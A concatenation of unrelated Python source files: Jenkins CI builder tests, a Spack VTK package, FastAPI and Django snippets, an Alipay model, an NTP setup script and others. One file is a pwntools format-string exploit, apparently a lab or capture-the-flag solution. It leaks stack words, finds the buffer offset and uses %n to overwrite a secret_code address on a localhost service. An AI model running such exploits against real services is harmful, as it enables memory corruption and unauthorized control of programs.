step = self.create_jobstep(phase, data=job.data)
artifact = self.create_artifact(step, name='foobar.log', data={
"displayPath": "foobar.log",
"fileName": "foobar.log",
"relativePath": "artifacts/foobar.log"
})
builder = self.get_builder()
builder.sync_artifact(artifact)
source = LogSource.query.filter(
LogSource.job_id == job.id,
LogSource.name == 'foobar.log',
).first()
assert source is not None
assert source.step == step
assert source.project == self.project
chunks = list(LogChunk.query.filter_by(
source=source,
).order_by(LogChunk.date_created.asc()))
assert len(chunks) == 1
assert chunks[0].job_id == job.id
assert chunks[0].project_id == self.project.id
assert chunks[0].offset == 0
assert chunks[0].size == 11
assert chunks[0].text == 'hello world'
@responses.activate
def test_sync_artifact_as_xunit(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/artifact/artifacts/xunit.xml',
body=SAMPLE_XUNIT,
stream=True)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
artifact = self.create_artifact(step, name='xunit.xml', data={
"displayPath": "xunit.xml",
"fileName": "xunit.xml",
"relativePath": "artifacts/xunit.xml"
})
builder = self.get_builder()
builder.sync_artifact(artifact)
test_list = list(TestCase.query.filter(
TestCase.job_id == job.id
))
assert len(test_list) == 2
@responses.activate
def test_sync_artifact_as_coverage(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/artifact/artifacts/coverage.xml',
body=SAMPLE_COVERAGE,
stream=True)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
artifact = self.create_artifact(step, name='coverage.xml', data={
"displayPath": "coverage.xml",
"fileName": "coverage.xml",
"relativePath": "artifacts/coverage.xml"
})
builder = self.get_builder()
builder.sync_artifact(artifact)
cover_list = list(FileCoverage.query.filter(
FileCoverage.job_id == job.id
))
assert len(cover_list) == 2
@responses.activate
def test_sync_artifact_as_file(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/artifact/artifacts/foo.bar',
body=SAMPLE_COVERAGE,
stream=True)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
artifact = self.create_artifact(step, name='foo.bar', data={
"displayPath": "foo.bar",
"fileName": "foo.bar",
"relativePath": "artifacts/foo.bar"
})
builder = self.get_builder()
builder.sync_artifact(artifact)
class SyncTestArtifactsTest(BaseTestCase):
@responses.activate
def test_sync_testartifacts(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/artifact/artifacts/xunit.xml',
body=SAMPLE_XUNIT_TESTARTIFACTS,
stream=True)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
artifact = self.create_artifact(step, name='xunit.xml', data={
"displayPath": "xunit.xml",
"fileName": "xunit.xml",
"relativePath": "artifacts/xunit.xml"
})
builder = self.get_builder()
builder.sync_artifact(artifact)
test_artifacts = list(TestArtifact.query)
test = TestCase.query.first()
assert len(test_artifacts) == 1
test_artifact = test_artifacts[0]
assert test_artifact.file.get_file().read() == "sample_content"
assert test_artifact.name == "sample_name.txt"
assert str(test_artifact.type) == "Text"
assert test_artifact.test == test
class JenkinsIntegrationTest(BaseTestCase):
"""
This test should ensure a full cycle of tasks completes successfully within
the jenkins builder space.
"""
# it's possible for this test to infinitely hang due to continuous polling,
# so let's ensure we set a timeout
@pytest.mark.timeout(5)
@mock.patch('changes.config.redis.lock', mock.MagicMock())
@eager_tasks
@responses.activate
def test_full(self):
from changes.jobs.create_job import create_job
job_id = '81d1596fd4d642f4a6bdf86c45e014e8'
jobstep_id = uuid5_from(job_id)
# TODO: move this out of this file and integrate w/ buildstep
responses.add(
responses.POST, 'http://jenkins.example.com/job/server/build',
body='',
status=201)
responses.add(
responses.GET,
'http://jenkins.example.com/queue/api/xml/?wrapper=x&xpath=%2Fqueue%2Fitem%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22+and+action%2Fparameter%2Fvalue%3D%22{}%22%5D%2Fid'.format(jobstep_id),
body=self.load_fixture('fixtures/GET/queue_item_by_job_id.xml'),
match_querystring=True)
responses.add(
responses.GET, 'http://jenkins.example.com/queue/item/13/api/json/',
body=self.load_fixture('fixtures/GET/queue_details_building.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_success.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
adding_headers={'X-Text-Size': '7'},
body='Foo bar')
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID(job_id))
plan = self.create_plan(self.project)
self.create_step(
plan, order=0, implementation='changes.backends.jenkins.buildstep.JenkinsBuildStep', data={
'job_name': 'server',
'jenkins_url': 'http://jenkins.example.com',
},
)
self.create_job_plan(job, plan)
job_id = job.id.hex
build_id = build.id.hex
create_job.delay(
job_id=job_id,
task_id=job_id,
parent_task_id=build_id,
)
job = Job.query.get(job_id)
assert job.status == Status.finished
assert job.result == Result.passed
assert job.date_created
assert job.date_started
assert job.date_finished
phase_list = job.phases
assert len(phase_list) == 1
assert phase_list[0].status == Status.finished
assert phase_list[0].result == Result.passed
assert phase_list[0].date_created
assert phase_list[0].date_started
assert phase_list[0].date_finished
step_list = phase_list[0].steps
assert len(step_list) == 1
assert step_list[0].status == Status.finished
assert step_list[0].result == Result.passed
assert step_list[0].date_created
assert step_list[0].date_started
assert step_list[0].date_finished
assert step_list[0].data == {
'item_id': '13',
'queued': False,
'log_offset': 7,
'job_name': 'server',
'build_no': 2,
'uri': 'https://jenkins.build.itc.dropbox.com/job/server/2/',
'master': 'http://jenkins.example.com',
}
node = step_list[0].node
assert node.label == 'server-ubuntu-10.04 (ami-746cf244) (i-836023b7)'
assert [n.label for n in node.clusters] == ['server-runner']
source = LogSource.query.filter_by(job=job).first()
assert source.name == step_list[0].label
assert source.step == step_list[0]
assert source.project == self.project
assert source.date_created == job.date_started
chunks = list(LogChunk.query.filter_by(
source=source,
).order_by(LogChunk.date_created.asc()))
assert len(chunks) == 1
assert chunks[0].job_id == job.id
assert chunks[0].project_id == self.project.id
assert chunks[0].offset == 0
assert chunks[0].size == 7
assert chunks[0].text == 'Foo bar'
|
import os
import sys
from types import ModuleType
from .module_loading import load_module
# we assume that our code is always run from the root dir of this repo and that nobody tampers with the python path
# we use this to determine whether we should back up the file a class is defined in: if it comes from
# our own code base, it might contain breaking changes in the future
code_root_path = sys.path[0]
def get_import_info(chain):
backup_info = get_backup_info(get_module(chain), chain)
return {
"import_string": f"from {backup_info['module_path']} import {backup_info['class_name']}",
"class_name": backup_info['class_name'],
}
def generate_backup_plan(chain):
    # TODO: this does not work yet if a child itself has children that need to be backed up...
    # a maximum of one level of nesting is supported right now
plan = {
"root_object": get_backup_info(get_module(chain), chain),
"children": generate_child_backup_plan(chain),
}
return remove_duplicates_from_backup_plan(plan)
def generate_child_backup_plan(parent):
children_to_backup = []
for child in parent.children():
child_module = get_module(child)
# flag this module as necessary for update only if it is in our code base
if code_root_path in child_module.__file__:
children_to_backup.append(get_backup_info(child_module, child))
children_to_backup.extend(generate_child_backup_plan(child))
return children_to_backup
def get_backup_info(module, obj):
return {
"module_path": module.__name__,
"class_name": obj.__class__.__name__,
"files": (get_definition_filepath(obj), get_definition_filename(obj))
}
def remove_duplicates_from_backup_plan(plan):
unique_children = []
module_paths = [plan['root_object']['module_path']]
for child in plan['children']:
if child['module_path'] in module_paths:
continue
module_paths.append(child['module_path'])
unique_children.append(child)
plan['children'] = unique_children
return plan
def get_module(obj):
return __import__(obj.__module__, fromlist=obj.__module__.split('.')[:-1])
def get_definition_filepath(obj):
return get_module(obj).__file__
def get_definition_filename(obj):
return os.path.basename(get_definition_filepath(obj))
def restore_backup(backup_plan, backup_dir):
if 'import_string' in backup_plan:
exec(backup_plan['import_string'])
klass = eval(backup_plan['class_name'])
return klass
# 1. load root module with network definition
root_module = load_module(os.path.abspath(os.path.join(backup_dir, backup_plan['root_object']["files"][1])))
# 2. adapt pointers to other modules that we created a backup of
for child in backup_plan['children']:
child_module = load_module(
os.path.abspath(os.path.join(backup_dir, child['files'][1])),
module_path=child['module_path']
)
for name in filter(lambda x: not x.startswith('_'), dir(root_module)):
module_attr = getattr(root_module, name)
if isinstance(module_attr, ModuleType) or module_attr.__module__ != child['module_path']:
                # if the attr we grabbed from the module is itself a module (so make sure to import classes directly!),
                # or if its module path does not match the one we saved, move on to the next attr
continue
if module_attr.__name__ != child['class_name']:
# we do not have the correct class right now
continue
setattr(root_module, name, getattr(child_module, child['class_name']))
break
return getattr(root_module, backup_plan['root_object']['class_name'])
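# A minimal sketch of how generate_backup_plan might be driven; DummyNet is a
# hypothetical stand-in for a real network object exposing children():
if __name__ == '__main__':
    class DummyNet:
        def children(self):
            return []
    plan = generate_backup_plan(DummyNet())
    print(plan['root_object']['class_name'])  # -> 'DummyNet'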
|
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import os
import sys
from spack import *
class Vtk(CMakePackage):
"""The Visualization Toolkit (VTK) is an open-source, freely
available software system for 3D computer graphics, image
processing and visualization. """
homepage = "http://www.vtk.org"
url = "http://www.vtk.org/files/release/8.0/VTK-8.0.1.tar.gz"
list_url = "http://www.vtk.org/download/"
version('8.1.2', sha256='0995fb36857dd76ccfb8bb07350c214d9f9099e80b1e66b4a8909311f24ff0db')
version('8.1.1', sha256='71a09b4340f0a9c58559fe946dc745ab68a866cf20636a41d97b6046cb736324')
version('8.0.1', '692d09ae8fadc97b59d35cab429b261a')
version('7.1.0', 'a7e814c1db503d896af72458c2d0228f')
version('7.0.0', '5fe35312db5fb2341139b8e4955c367d')
version('6.3.0', '0231ca4840408e9dd60af48b314c5b6d')
version('6.1.0', '25e4dfb3bad778722dcaec80cd5dab7d')
# VTK7 defaults to OpenGL2 rendering backend
variant('opengl2', default=True, description='Enable OpenGL2 backend')
variant('osmesa', default=False, description='Enable OSMesa support')
variant('python', default=False, description='Enable Python support')
variant('qt', default=False, description='Build with support for Qt')
variant('xdmf', default=False, description='Build XDMF file support')
variant('ffmpeg', default=False, description='Build with FFMPEG support')
variant('mpi', default=True, description='Enable MPI support')
patch('gcc.patch', when='@6.1.0')
# At the moment, we cannot build with both osmesa and qt, but as of
# VTK 8.1, that should change
conflicts('+osmesa', when='+qt')
depends_on('python', when='+python')
depends_on('py-mpi4py', when='+mpi +python', type='run')
extends('python', when='+python')
# python3.7 compatibility patch backported from upstream
# https://gitlab.kitware.com/vtk/vtk/commit/706f1b397df09a27ab8981ab9464547028d0c322
patch('python3.7-const-char.patch', when='@:8.1.1 ^python@3.7:')
# The use of the OpenGL2 backend requires at least OpenGL Core Profile
# version 3.2 or higher.
depends_on('gl@3.2:', when='+opengl2')
depends_on('gl@1.2:', when='~opengl2')
if sys.platform != 'darwin':
depends_on('glx', when='~osmesa')
# Note: it is recommended to use mesa+llvm, if possible.
# mesa default is software rendering, llvm makes it faster
depends_on('mesa+osmesa', when='+osmesa')
# VTK will need Qt5OpenGL, and qt needs '-opengl' for that
depends_on('qt+opengl', when='+qt')
depends_on('mpi', when='+mpi')
depends_on('boost', when='+xdmf')
depends_on('boost+mpi', when='+xdmf +mpi')
depends_on('ffmpeg', when='+ffmpeg')
depends_on('expat')
depends_on('freetype')
depends_on('glew')
depends_on('hdf5')
depends_on('libjpeg')
depends_on('jsoncpp')
depends_on('libxml2')
depends_on('lz4')
depends_on('netcdf')
depends_on('netcdf-cxx')
depends_on('libpng')
depends_on('libtiff')
depends_on('zlib')
def url_for_version(self, version):
url = "http://www.vtk.org/files/release/{0}/VTK-{1}.tar.gz"
return url.format(version.up_to(2), version)
def setup_environment(self, spack_env, run_env):
# VTK has some trouble finding freetype unless it is set in
# the environment
spack_env.set('FREETYPE_DIR', self.spec['freetype'].prefix)
def cmake_args(self):
spec = self.spec
opengl_ver = 'OpenGL{0}'.format('2' if '+opengl2' in spec else '')
cmake_args = [
'-DBUILD_SHARED_LIBS=ON',
'-DVTK_RENDERING_BACKEND:STRING={0}'.format(opengl_ver),
# In general, we disable use of VTK "ThirdParty" libs, preferring
# spack-built versions whenever possible
'-DVTK_USE_SYSTEM_LIBRARIES:BOOL=ON',
# However, in a few cases we can't do without them yet
'-DVTK_USE_SYSTEM_GL2PS:BOOL=OFF',
'-DVTK_USE_SYSTEM_LIBHARU=OFF',
'-DVTK_USE_SYSTEM_LIBPROJ4:BOOL=OFF',
'-DVTK_USE_SYSTEM_OGGTHEORA:BOOL=OFF',
'-DNETCDF_DIR={0}'.format(spec['netcdf'].prefix),
'-DNETCDF_C_ROOT={0}'.format(spec['netcdf'].prefix),
'-DNETCDF_CXX_ROOT={0}'.format(spec['netcdf-cxx'].prefix),
# Disable wrappers for other languages.
'-DVTK_WRAP_JAVA=OFF',
'-DVTK_WRAP_TCL=OFF',
]
if '+mpi' in spec:
cmake_args.extend([
'-DVTK_Group_MPI:BOOL=ON',
'-DVTK_USE_SYSTEM_DIY2:BOOL=OFF',
])
if '+ffmpeg' in spec:
cmake_args.extend(['-DModule_vtkIOFFMPEG:BOOL=ON'])
# Enable/Disable wrappers for Python.
if '+python' in spec:
cmake_args.extend([
'-DVTK_WRAP_PYTHON=ON',
'-DPYTHON_EXECUTABLE={0}'.format(spec['python'].command.path),
'-DVTK_USE_SYSTEM_MPI4PY:BOOL=ON'
])
else:
cmake_args.append('-DVTK_WRAP_PYTHON=OFF')
if 'darwin' in spec.architecture:
cmake_args.extend([
'-DCMAKE_MACOSX_RPATH=ON'
])
if '+qt' in spec:
qt_ver = spec['qt'].version.up_to(1)
qt_bin = spec['qt'].prefix.bin
qmake_exe = os.path.join(qt_bin, 'qmake')
cmake_args.extend([
# Enable Qt support here.
'-DVTK_QT_VERSION:STRING={0}'.format(qt_ver),
'-DQT_QMAKE_EXECUTABLE:PATH={0}'.format(qmake_exe),
'-DVTK_Group_Qt:BOOL=ON',
])
# NOTE: The following definitions are required in order to allow
# VTK to build with qt~webkit versions (see the documentation for
# more info: http://www.vtk.org/Wiki/VTK/Tutorials/QtSetup).
if '~webkit' in spec['qt']:
cmake_args.extend([
'-DVTK_Group_Qt:BOOL=OFF',
'-DModule_vtkGUISupportQt:BOOL=ON',
'-DModule_vtkGUISupportQtOpenGL:BOOL=ON',
])
if '+xdmf' in spec:
if spec.satisfies('^cmake@3.12:'):
# This policy exists only for CMake >= 3.12
cmake_args.extend(["-DCMAKE_POLICY_DEFAULT_CMP0074=NEW"])
cmake_args.extend([
# Enable XDMF Support here
"-DModule_vtkIOXdmf2:BOOL=ON",
"-DModule_vtkIOXdmf3:BOOL=ON",
"-DBOOST_ROOT={0}".format(spec['boost'].prefix),
"-DBOOST_LIBRARY_DIR={0}".format(spec['boost'].prefix.lib),
"-DBOOST_INCLUDE_DIR={0}".format(spec['boost'].prefix.include),
"-DBOOST_NO_SYSTEM_PATHS:BOOL=ON",
# This is needed because VTK has multiple FindBoost
# and they stick to system boost if there's a system boost
# installed with CMake
"-DBoost_NO_BOOST_CMAKE:BOOL=ON",
"-DHDF5_ROOT={0}".format(spec['hdf5'].prefix),
# The xdmf project does not export any CMake file...
"-DVTK_USE_SYSTEM_XDMF3:BOOL=OFF",
"-DVTK_USE_SYSTEM_XDMF2:BOOL=OFF"
])
if '+mpi' in spec:
cmake_args.extend(["-DModule_vtkIOParallelXdmf3:BOOL=ON"])
        # the rendering backend flag is already set above via opengl_ver
        cmake_args.append('-DVTK_USE_SYSTEM_GLEW:BOOL=ON')
if '+osmesa' in spec:
cmake_args.extend([
'-DVTK_USE_X:BOOL=OFF',
'-DVTK_USE_COCOA:BOOL=OFF',
'-DVTK_OPENGL_HAS_OSMESA:BOOL=ON'])
else:
cmake_args.extend([
'-DVTK_OPENGL_HAS_OSMESA:BOOL=OFF',
'-DOpenGL_GL_PREFERENCE:STRING=LEGACY'])
if 'darwin' in spec.architecture:
cmake_args.extend([
'-DVTK_USE_X:BOOL=OFF',
'-DVTK_USE_COCOA:BOOL=ON'])
elif 'linux' in spec.architecture:
cmake_args.extend([
'-DVTK_USE_X:BOOL=ON',
'-DVTK_USE_COCOA:BOOL=OFF'])
if spec.satisfies('@:6.1.0'):
cmake_args.extend([
'-DCMAKE_C_FLAGS=-DGLX_GLXEXT_LEGACY',
'-DCMAKE_CXX_FLAGS=-DGLX_GLXEXT_LEGACY'
])
# VTK 6.1.0 (and possibly earlier) does not use
# NETCDF_CXX_ROOT to detect NetCDF C++ bindings, so
# NETCDF_CXX_INCLUDE_DIR and NETCDF_CXX_LIBRARY must be
# used instead to detect these bindings
netcdf_cxx_lib = spec['netcdf-cxx'].libs.joined()
cmake_args.extend([
'-DNETCDF_CXX_INCLUDE_DIR={0}'.format(
spec['netcdf-cxx'].prefix.include),
'-DNETCDF_CXX_LIBRARY={0}'.format(netcdf_cxx_lib),
])
# Garbage collection is unsupported in Xcode starting with
# version 5.1; if the Apple clang version of the compiler
# is 5.1.0 or later, unset the required Objective-C flags
# to remove the garbage collection flags. Versions of VTK
# after 6.1.0 set VTK_REQUIRED_OBJCXX_FLAGS to the empty
# string. This fix was recommended on the VTK mailing list
# in March 2014 (see
# https://public.kitware.com/pipermail/vtkusers/2014-March/083368.html)
if (self.spec.satisfies('%clang') and
self.compiler.is_apple and
self.compiler.version >= Version('5.1.0')):
cmake_args.extend(['-DVTK_REQUIRED_OBJCXX_FLAGS=""'])
return cmake_args
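# A rough usage sketch (spec syntax only; the variant combinations are taken
# from the declarations above):
#   spack install vtk+python+mpi    # Python wrappers with MPI support
#   spack install vtk+osmesa~qt     # off-screen rendering; +osmesa conflicts with +qt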
|
import matrix
import digits
import urandom
import time
#assign randint function to r
r = urandom.randint
#shorthand for the matrix class
s = matrix.matrix
#shorthand for the digits module
d = digits
#initialize led matrix
s.init()
#clear led matrix
s.clear_all()
#show changes
s.show()
color = 0
while 1:
	#set the active color (incremented by 5 at the end of each loop)
s.pixel_color( color )
#write pixmap of random digit to pic variable
pic = d.get_digit( r(0,9), d.digits_center )
#pic = d.get_digit( r(0,9), d.digits_left )
#pic = d.get_digit( r(0,9), d.digits_right )
#write pixmap to led matrix
s.clear_all()
s.pixel_mask( pic )
#show changes
s.show()
#wait some time
time.sleep_ms(1000)
color = color + 5
|
import pytest
from fastapi.applications import FastAPI
from httpx import AsyncClient
from starlette.status import HTTP_200_OK, HTTP_400_BAD_REQUEST
from app.models.domain.users import UserInDB
pytestmark = pytest.mark.asyncio
async def test_user_successful_login(
app: FastAPI, client: AsyncClient, test_user: UserInDB
) -> None:
login_json = {"user": {"email": "test@test.com", "password": "password"}}
response = await client.post(app.url_path_for("auth:login"), json=login_json)
assert response.status_code == HTTP_200_OK
@pytest.mark.parametrize(
"credentials_part, credentials_value",
(("email", "wrong@test.com"), ("password", "wrong")),
)
async def test_user_login_when_credential_part_does_not_match(
app: FastAPI,
client: AsyncClient,
test_user: UserInDB,
credentials_part: str,
credentials_value: str,
) -> None:
login_json = {"user": {"email": "test@test.com", "password": "password"}}
login_json["user"][credentials_part] = credentials_value
response = await client.post(app.url_path_for("auth:login"), json=login_json)
assert response.status_code == HTTP_400_BAD_REQUEST
|
from django.conf.urls import url, include
from .views import test
urlpatterns = [
url(r'^test/$', test, name='front-test'),
url(r'^i18n/', include('django.conf.urls.i18n')),
]
|
from pwn import *
# Dump stack words with %x to locate the offset of our buffer ('AAAA') in the format string output
conn = remote("localhost", 50000)
print(conn.recv())
conn.send("I am not a robotBBAAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x\r\n")
print(conn.recv())
# Check the index of the buffer
conn = remote("localhost", 50000)
print(conn.recv())
conn.send(b"I am not a robotBBAAAA%11$p\r\n")
print(conn.recv())
# Overwrite the secret_code address
conn = remote("localhost", 50000)
print(conn.recv())
conn.send(b"I am not a robotBB\xbc\xff\x0d\x08%168x%11$n\r\n") # 080dffbc
print(conn.recv())
conn.interactive()
|
def string_to_bool(string):
if string in ('True', 'true', 'yes', 'y'):
return True
elif string in ('False', 'false', 'no', 'n'):
return False
else:
raise ValueError('Invalid string passed to string_to_bool.')
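# Example usage:
#   string_to_bool('yes')    # -> True
#   string_to_bool('false')  # -> False
#   string_to_bool('maybe')  # raises ValueError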
|
class Solution(object):
    def uniquePaths(self, m, n):
        # Count lattice paths from the top-left to the bottom-right of an
        # m x n grid moving only right or down, using O(min(m, n)) space.
        if m < n:
            # iterate over the longer dimension and keep the shorter as the row
            return self.uniquePaths(n, m)
        ways = [1] * n
        for i in range(1, m):
            for j in range(1, n):
                # paths into cell (i, j) = paths from above + paths from the left
                ways[j] += ways[j - 1]
        return ways[n - 1]
m = 4
n = 3
res = Solution().uniquePaths(m, n)
print(res)  # 10
|
from ....models import Instrument
from baselayer.app.access import auth_or_token
from ...base import BaseHandler
class RoboticInstrumentsHandler(BaseHandler):
@auth_or_token
def get(self):
instruments = (
Instrument.query_records_accessible_by(self.current_user)
.filter(Instrument.api_classname.isnot(None))
.all()
)
retval = {i.id: i.api_class.frontend_render_info(i) for i in instruments}
self.verify_and_commit()
return self.success(data=retval)
|
from typing import Dict, Optional, Sequence, Union
from rastervision2.pipeline.config import Config, register_config, Field
ClassFilter = Sequence[Union[str, 'ClassFilter']]
@register_config('vector_source')
class VectorSourceConfig(Config):
default_class_id: Optional[int] = Field(
...,
description=
('The default class_id to use if class cannot be inferred using other '
'mechanisms. If a feature defaults to a class_id of None, then that feature '
'will be deleted.'))
class_id_to_filter: Optional[Dict[int, Optional[ClassFilter]]] = Field(
None,
description=(
'Map from class_id to JSON filter used to infer missing class_ids. The '
'filter schema is according to '
'https://github.com/mapbox/mapbox-gl-js/blob/c9900db279db776f493ce8b6749966cedc2d6b8a/src/style-spec/feature_filter/index.js.' # noqa
))
    line_bufs: Optional[Dict[int, Union[int, float, None]]] = Field(
        None,
        description=
        ('Map from class_id to the number of pixels to buffer LineStrings by. '
         'This is useful, for example, for buffering lines representing roads so that '
         'their width roughly matches the width of roads in the imagery. If None, a '
         'default buffer value of 1 is used. If the buffer value for a class is None, '
         'then no buffering will be performed and the LineString or Point won\'t get '
         'converted to a Polygon. Not converting to Polygon is incompatible with the '
         'currently available LabelSources, but may be useful in the future.'))
point_bufs: Optional[Dict[int, Union[int, float, None]]] = Field(
None,
description=
'Same as above, but used for buffering Points into Polygons.')
def has_null_class_bufs(self):
if self.point_bufs is not None:
for c, v in self.point_bufs.items():
if v is None:
return True
if self.line_bufs is not None:
for c, v in self.line_bufs.items():
if v is None:
return True
return False
def build(self, class_config, crs_transformer):
raise NotImplementedError()
def update(self, pipeline=None, scene=None):
pass
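# An illustrative buffer mapping for a concrete subclass config (hypothetical
# values): buffer LineStrings of class 0 by 3 pixels and leave class 1
# unbuffered (None keeps the raw geometry, per the line_bufs description):
#   line_bufs={0: 3, 1: None}
#   point_bufs={0: 1.5}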
|
import unittest.mock as mock
from unittest import TestCase
from esrally import racecontrol, config, exceptions
class RaceControlTests(TestCase):
def test_finds_available_pipelines(self):
expected = [
["from-sources-complete", "Builds and provisions Elasticsearch, runs a benchmark and reports results."],
["from-sources-skip-build", "Provisions Elasticsearch (skips the build), runs a benchmark and reports results."],
["from-distribution", "Downloads an Elasticsearch distribution, provisions it, runs a benchmark and reports results."],
["benchmark-only", "Assumes an already running Elasticsearch instance, runs a benchmark and reports results"]
]
self.assertEqual(expected, racecontrol.available_pipelines())
def test_prevents_running_an_unknown_pipeline(self):
cfg = config.Config()
cfg.add(config.Scope.benchmark, "race", "pipeline", "invalid")
cfg.add(config.Scope.benchmark, "mechanic", "distribution.version", "5.0.0")
with self.assertRaises(exceptions.SystemSetupError) as ctx:
racecontrol.run(cfg)
self.assertRegex(ctx.exception.args[0], r"Unknown pipeline \[invalid\]. List the available pipelines with [\S]+? list pipelines.")
def test_runs_a_known_pipeline(self):
mock_pipeline = mock.Mock()
p = racecontrol.Pipeline("unit-test-pipeline", "Pipeline intended for unit-testing", mock_pipeline)
cfg = config.Config()
cfg.add(config.Scope.benchmark, "race", "pipeline", "unit-test-pipeline")
cfg.add(config.Scope.benchmark, "mechanic", "distribution.version", "")
racecontrol.run(cfg)
mock_pipeline.assert_called_once_with(cfg)
# ensure we remove it again from the list of registered pipelines to avoid unwanted side effects
del p
|
import unittest
import odatacameradeputados
class GetInfoCDProposicoes(unittest.TestCase):
def test_get_proposicoes_200OK(self):
proposicoes = odatacameradeputados.get_proposicoes()
self.assertTrue(proposicoes["status_code"] == 200)
def test_get_proposicoes_not_none(self):
proposicoes = odatacameradeputados.get_proposicoes()
self.assertNotEqual(proposicoes, None)
def test_get_proposicoes_not_empty(self):
proposicoes = odatacameradeputados.get_proposicoes()
self.assertTrue(len(proposicoes["proposicoes"]) > 0)
def test_get_proposicoes_any_id(self):
proposicoes = odatacameradeputados.get_proposicoes()
self.assertTrue("id" in proposicoes["proposicoes"]["dados"][0]
and proposicoes["proposicoes"]["dados"][0]["id"] > 0)
def test_get_proposicoes_first_id(self):
# Preparing test
proposicoes = odatacameradeputados.get_proposicoes()
        # retrieve a single id (the second item in the returned list)
id_proposicoes = proposicoes["proposicoes"]["dados"][1]["id"]
proposicoes = odatacameradeputados.get_proposicoes(ids=id_proposicoes)
self.assertTrue("id" in proposicoes["proposicoes"]["dados"][0]
and proposicoes["proposicoes"]["dados"][0]["id"] == id_proposicoes)
def test_get_proposicoes_200OK_pg2(self):
proposicoes = odatacameradeputados.get_proposicoes(pagina=2)
self.assertTrue(proposicoes["status_code"] == 200)
self.assertTrue(proposicoes["total_retornado"] > 0)
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import simplejson as json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.FengdieActivityCreateData import FengdieActivityCreateData
class AlipayMarketingToolFengdieActivityCreateModel(object):
def __init__(self):
self._activity = None
self._template_id = None
@property
def activity(self):
return self._activity
@activity.setter
def activity(self, value):
if isinstance(value, FengdieActivityCreateData):
self._activity = value
else:
self._activity = FengdieActivityCreateData.from_alipay_dict(value)
@property
def template_id(self):
return self._template_id
@template_id.setter
def template_id(self, value):
self._template_id = value
def to_alipay_dict(self):
params = dict()
if self.activity:
if hasattr(self.activity, 'to_alipay_dict'):
params['activity'] = self.activity.to_alipay_dict()
else:
params['activity'] = self.activity
if self.template_id:
if hasattr(self.template_id, 'to_alipay_dict'):
params['template_id'] = self.template_id.to_alipay_dict()
else:
params['template_id'] = self.template_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayMarketingToolFengdieActivityCreateModel()
if 'activity' in d:
o.activity = d['activity']
if 'template_id' in d:
o.template_id = d['template_id']
return o
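# --- Illustrative usage sketch (not part of the generated model) ---
# Round-trips a plain dict through the model. The `activity` setter above
# converts a dict into a FengdieActivityCreateData instance; the payload keys
# used here are assumptions made purely for illustration.
if __name__ == '__main__':
    model = AlipayMarketingToolFengdieActivityCreateModel.from_alipay_dict({
        'template_id': 'tpl_001',
        'activity': {'name': 'demo'},
    })
    print(json.dumps(model.to_alipay_dict()))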
|
# *****************************************************************
# Copyright 2015 MIT Lincoln Laboratory
# Project: SPAR
# Authors: OMD
# Description: Python script to configure an NTP client and run it
#
# Modifications:
# Date Name Modification
# ---- ---- ------------
# 30 Apr 2012 omd Original Version
# *****************************************************************
import subprocess
import os
import os.path
NTP_DIR = '/tmp/ntp'
replace_dict = {
'~~MASTER-IP~~': '192.168.100.10',
'~~NTP-DIR~~': NTP_DIR,
}
THIS_DIR = os.path.dirname(os.path.abspath(__file__))
config_template = file(os.path.join(THIS_DIR, 'ntp.client.conf'), 'r')
try:
os.makedirs(NTP_DIR)
except OSError, e:
# Error 17 indicates the directory already exists which is fine.
if e.errno != 17:
raise e
config_file = file(os.path.join(NTP_DIR, 'ntp.client.conf'), 'w+')
for line in config_template:
for search, replace in replace_dict.iteritems():
line = line.replace(search, replace)
config_file.write(line)
